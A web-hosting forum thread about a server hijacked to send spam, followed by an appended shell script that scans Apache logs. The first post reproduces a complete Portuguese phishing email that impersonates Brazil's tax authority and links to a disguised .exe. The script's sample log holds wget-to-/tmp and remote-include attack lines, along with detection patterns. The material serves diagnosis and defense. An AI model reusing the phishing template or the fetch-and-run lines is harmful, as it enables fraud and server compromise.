  1. #1
    Registered User
    Join Date
    Jan 2006
    Posts
    1

    Server sending mass mail to .com.br

    Hi,

    This is the second time I have faced the same problem: the server starts sending mass mail to unknown addresses and all of it bounces back to the server, mails sent by nobody.

    Does anybody know what the reason is?

    Here is a sample of the mail:

    1F6iA4-0006NK-8A-H
    mailnull 47 12
    <>
    1139377600 0
    -ident mailnull
    -received_protocol local
    -body_linecount 71
    -allow_unqualified_recipient
    -allow_unqualified_sender
    -frozen 1139377601
    -localerror
    XX
    1
    nobody@mt2.midyatech.com

    152P Received: from mailnull by mt2.midyatech.com with local (Exim 4.52)
    id 1F6iA4-0006NK-8A
    for nobody@mt2.midyatech.com; Wed, 08 Feb 2006 08:46:17 +0300
    046 X-Failed-Recipients: overm1nd_go@yahoo.com.br
    031 Auto-Submitted: auto-generated
    061F From: Mail Delivery System <Mailer-Daemon@mt2.midyatech.com>
    029T To: nobody@mt2.midyatech.com
    059 Subject: Mail delivery failed: returning message to sender
    050I Message-Id: <E1F6iA4-0006NK-8A@mt2.midyatech.com>
    038 Date: Wed, 08 Feb 2006 08:46:17 +0300

    1F6iA4-0006NK-8A-D
    This message was created automatically by mail delivery software.

    A message that you sent could not be delivered to one or more of its
    recipients. This is a permanent error. The following address(es) failed:

    overm1nd_go@yahoo.com.br
    unrouteable mail domain "yahoo.com.br"

    ------ This is a copy of the message, including all the headers. ------

    Return-path: <nobody@mt2.midyatech.com>
    Received: from nobody by mt2.midyatech.com with local (Exim 4.52)
    id 1F6iA4-0006NF-4n
    for overm1nd_go@yahoo.com.br; Wed, 08 Feb 2006 08:46:17 +0300
    To: overm1nd_go@yahoo.com.br
    Subject: Reaviso: Verifique o seu CPF
    MIME-Version: 1.0
    Content-type: text/html; charset=iso-8859-1
    From: aviso@receita-federal.org <aviso@receita-federal.org>
    Message-Id: <E1F6iA4-0006NF-4n@mt2.midyatech.com>
    Date: Wed, 08 Feb 2006 08:46:17 +0300


    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
    <HTML><BASE HREF="http://receita.gov.br/">
    <head>
    <title>Receita Federal</title>
    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
    </head>
    <body>
    <table width="550" height="690" border="1" cellpadding="0" cellspacing="0">
    <!--DWLayoutTable-->
    <tr>
    <td width="546" height="688" valign="top" bordercolor="#FFFFFF"> <div align="left"><img src="http://www.receita.fazenda.gov.br/images/Menu/logo_srf.gif" width="152" height="51" hspace="0" vspace="0" border="0"><img src="http://www.receita.fazenda.gov.br/images/Menu/predios_srf.gif" width="238" height="51" hspace="0" vspace="0" border="0"><img src="http://www.srorgcontabil.com.br/images/banner_receitafederal.gif" width="148" height="51" border="0"> <img src="http://www.fazenda.gov.br/imagens/novobanner.gif" width="430" height="35" border="0"><img src="http://www.fazenda.gov.br/imagens/novobanner2.gif" width="116" height="35" border="0">
    </div>

    <blockquote>
    <div align="left">
    <p align="left"><font color="#FF0000" face="Verdana, Arial, Helvetica, sans-serif"><strong>AVISO URGENTE </strong></font></p>
    <p align="left"><font color="#003366" face="Verdana" style="font-size:11px"><b><font color="#004284">Caro
    contribuinte,</font></b></font></p>
    <p align="left"><font color="#004284"><font size="2" face="Verdana, Arial, Helvetica, sans-serif">Estamos lhe enviando esta notificação para que você efetue a Declaração e Regularização de seu CPF.</font></font></p>
    <p align="left"><font color="#004284"><font size="2" face="Verdana, Arial, Helvetica, sans-serif">Para efetuar esta declaração você deverá acessar o seguinte site apenas clicando no link abaixo: </font></font></p>

    <p align="left"><font face="Verdana" color="#0071E1" style="font-size:11px"><a href="http://www.receita-federal.org/recadastramento.exe">http://www.receita-federal.org/recadastramento.exe</a></font></p>
    </div>
    <p align="justify"><font color="#004284" face="Verdana" style="font-size:11px">Quem
    não efetuar esta declaração poderá ter seu CPF suspenso, podendo indisponabilizar de alguns serviços como registros nominais ou compras. </font></p>
    <p align="justify"><font color="#004284" face="Verdana" style="font-size:11px">Por
    questões de segurança, informações e dados
    do contribuinte não são solicitados por e-mail em hipótese
    alguma.</font></p>

    <p align="justify"> </p>
    <p align="justify"><b><font face="Verdana" color="#004284" style="font-size:11px">Atenciosamente,</font></p>
    <p><font face="Verdana" color="#004284" style="font-size:11px">Coordenação
    de Integração Fisco-Contribuinte<br>
    Secretaria da Receita Federal</font><br>
    </p>
    <p align="center"><img src="http://www.receita.fazenda.gov.br/images/Centro/selo_36anos_srf.gif" width="126" height="123" border="0" align="right"></p>

    <p align="center"> </p>
    <p align="center"><img src="http://www.distritofederal.df.gov.br/sites/100/129/imagens/receitafederal.jpg" width="116" height="52" border="0" align="left"></p>

    </div>

    </blockquote></td>
    </tr>
    </table>
    </html>

  2. #2
    Member
    Join Date
    Jan 2006
    Posts
    26

    It would be because somewhere on your server a script uploaded has been exploited or perhaps the server itself and a hacker has uploaded some spamming scripts and run them. Typical things to check are suspicious files owned by nobody in /tmp and /dev/shm . You can grep /usr/local/apache/domlogs/* for wget, /tmp etc... to try and find which script was exploited to upload it if you find an uploaded one. You can also search these forums for many other suggestions on how to track this.

  3. #3
    AndyReed (cPanel Partner NOC)
    Join Date
    May 2004
    Location
    Minneapolis, MN
    Posts
    2,223

    We have seen this issue with many clients and the only way out is to find these bad/insecure scripts and either suspend or delete them. We wrote a script that tracks down these malicious scripts and helped us solve these problems for good.
    Last edited by AndyReed; 02-08-2006 at 10:41 PM.
    Andy Reed
    RHCE and CCNA
    ServerTune.com

  4. #4
    Member
    Join Date
    Feb 2005
    Posts
    80

    Even I faced this problem with my server, but after installing mod_security it solved my issues. Try that; maybe it helps.

  5. #5
    Member
    Join Date
    Feb 2004
    Posts
    53

    What happens if I modify the chmod of wget?

    now - -rwx------ 1 root root 175000 Aug 4 2003 wget*

    later - ---------- 1 root root 175000 Aug 4 2003 wget

    Thanks a lot,

  6. #6
    chirpy (Super Moderator; this forum account has been confirmed by cPanel staff to represent a vendor)
    Join Date
    Jun 2002
    Location
    Go on, have a guess
    Posts
    13,495

    That's a very bad idea. The minimum permissions that you should have on wget are 700 otherwise you're going to break things. With 700, users are not going to be able to run wget anyway.

    I'd echo the advice Jimmyftw gave.
    Jonathan Michaelson

    Need your cPanel servers secured and tuned?
    cPanel Server Configuration, Security, Recovery and Antivirus/AntiSpam Services
    Developers of the most effective (and free) Firewall & Security Solution for cPanel Servers - csf
    http://www.configserver.com

  7. #7
    Registered User
    Join Date
    Mar 2005
    Posts
    4

    Definitely a hacker script.
    Check the link in that e-mail ... "http://www.receita-federal.org/....". It is pointing to an exe file on a domain that looks like the Brazilian IRS but actually isn't.

  8. #8
    Member
    Join Date
    Dec 2003
    Posts
    36

    Check your /tmp directory for scripts and do a 'ps -auxfww' to see what is actually running. This has happened to us before. Check for old versions of phpBB that could be exploited; you can use this script that will automatically detect out-of-date versions of phpBB: http://www.cplicensing.net/files/scripts/chkphpbbver
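Reply #2 suggests grepping the Apache domlogs for "wget" and "/tmp", and reply #8 adds checking /tmp for dropped scripts. The script below is an added example, not from anyone in this thread, that turns that grep into a small repeatable triage: the log lines are constructed, the IPs are documentation ranges, and the only real path assumed is the /usr/local/apache/domlogs directory named in reply #2.

```shell
#!/bin/sh
# Added example (constructed, not from the thread): triage a cPanel/Apache
# domlog for the fetch-and-drop patterns reply #2 recommends grepping for.

# Print requests that carry a remote fetch tool (wget, curl, lynx, fetch),
# a write into /tmp or /dev/shm, or an http:// URL passed as a parameter
# (a classic remote-file-inclusion indicator).
# Usage: scan_domlog /usr/local/apache/domlogs/example.com
scan_domlog() {
    grep -E -i 'wget|curl|lynx|fetch|/tmp/|/dev/shm|=http(s)?(%3a|:)' "$1"
}

# Number of suspicious lines, so the result can be checked, not eyeballed.
count_hits() {
    scan_domlog "$1" | wc -l | tr -d ' '
}

# Which client IPs issued the suspicious requests, most frequent first.
top_sources() {
    scan_domlog "$1" | awk '{print $1}' | sort | uniq -c | sort -rn
}

# Constructed sample log: two ordinary requests and three attempts to pull a
# remote file into /tmp or include a remote URL through a script parameter.
SAMPLE_LOG="$(mktemp)"
cat >"$SAMPLE_LOG" <<'EOF'
203.0.113.5 - - [08/Feb/2006:08:40:01 +0300] "GET /index.php HTTP/1.1" 200 4123
203.0.113.5 - - [08/Feb/2006:08:40:02 +0300] "GET /images/logo.gif HTTP/1.1" 200 1021
198.51.100.7 - - [08/Feb/2006:08:41:10 +0300] "GET /forum/view.php?id=1&q=wget%20http://198.51.100.9/x.txt%20-O%20/tmp/x HTTP/1.1" 200 311
198.51.100.7 - - [08/Feb/2006:08:41:12 +0300] "GET /forum/view.php?id=1&q=perl%20/tmp/x HTTP/1.1" 200 298
192.0.2.44 - - [08/Feb/2006:08:45:55 +0300] "GET /gallery/index.php?page=http://192.0.2.60/s.txt HTTP/1.1" 200 9021
EOF

# Stand-alone run: show the hits and the source summary for the sample.
scan_domlog "$SAMPLE_LOG"
echo "suspicious requests: $(count_hits "$SAMPLE_LOG")"
top_sources "$SAMPLE_LOG"
```

On a real server, loop the same function over /usr/local/apache/domlogs/* and cross-check the timestamps against the Exim spool "-frozen" times shown in the first post to find which site the spam script was dropped through.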
